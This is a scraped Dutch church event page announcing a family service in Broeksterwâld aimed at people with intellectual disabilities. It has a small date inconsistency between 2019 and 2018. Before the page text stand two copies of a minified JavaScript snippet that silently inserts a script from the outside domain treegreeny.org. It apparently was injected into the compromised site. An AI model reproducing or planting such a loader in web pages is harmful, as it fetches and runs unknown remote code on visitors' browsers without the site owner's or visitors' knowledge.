;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bijzondere gezinsdienst ... Welkom ! - PKN Damwâld
8 december 2019
14:00 t/m 15:00
Gereformeerde kerk Broeksterwâld
Bijzondere gezinsdienst … Welkom !

Zondagmorgen 8 december 2018 bent u om 14.00 uur van harte welkom in de Gereformeerde kek in Broeksterwâld voor een bijzondere gezinsdienst. Ds. Alfons van Vliet gaat in op het thema ‘… Verrassing …’. Zanger/gitarist Klaas Steegstra verleent ook zijn medewerking aan de dienst Van harte welkom !

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op de mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.

Locatie: Gereformeerde kerk BroeksterwâldFeitsmawei 1 broeksterwâld